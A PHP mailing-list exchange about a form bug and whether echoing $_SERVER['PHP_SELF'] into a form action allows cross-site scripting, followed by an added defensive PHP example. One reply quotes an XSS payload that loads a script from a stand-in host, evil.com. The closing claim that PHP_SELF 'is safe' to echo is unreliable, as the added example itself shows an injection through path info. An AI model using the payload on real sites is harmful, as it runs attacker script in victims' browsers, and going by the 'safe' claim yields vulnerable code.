Hi Jochem,

Jochem Maas wrote:
On 3/10/10 6:23 PM, Joseph Thayne wrote:
Looks to me like you are closing your form before you put anything in
it.  Therefore, the loan_amount is not set, making the value 0.  Follow
the math, and you are dividing by 1-1.

Change this line:

<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>


<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">

This is an XSS waiting to happen. I can put something like the following in
the request URI:

index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js";></script>

Apparently it's not going to work. PHP_SELF does not include the query string. So it is safe to use it this way.


PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
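
Added example, not part of the thread or of any poster's code: `$_SERVER['PHP_SELF']` holds the script path plus any extra path info the client appends after the script name, so a defensive form encodes it for the attribute context or uses `SCRIPT_NAME` instead. The function names and the sample `$server` values are constructed for illustration.

```php
<?php
// Added example: names and sample values below are constructed for illustration.

/** Encode a string for use inside a quoted HTML attribute. */
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Build the opening <form> tag that posts back to the current script.
 * SCRIPT_NAME is the script's own path; PHP_SELF is the same path plus any
 * extra path info the client appended, so it is treated as untrusted input.
 */
function self_post_form(array $server, bool $useScriptName = true): string
{
    $target = $useScriptName
        ? ($server['SCRIPT_NAME'] ?? '')
        : ($server['PHP_SELF'] ?? '');
    return '<form action="' . attr($target) . '" method="post">';
}

// Constructed $_SERVER values for a request with trailing path info.
$server = [
    'SCRIPT_NAME' => '/index.php',
    'PHP_SELF'    => '/index.php/" data-injected="1',
];

// Unencoded echo, as in the thread: the quote in PHP_SELF ends the attribute.
echo '<form action="' . $server['PHP_SELF'] . '" method="post">', "\n";

// Encoded PHP_SELF: the quote becomes &quot; and stays inside the attribute.
echo self_post_form($server, false), "\n";

// SCRIPT_NAME, encoded: the client-supplied suffix is not used at all.
echo self_post_form($server), "\n";
```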
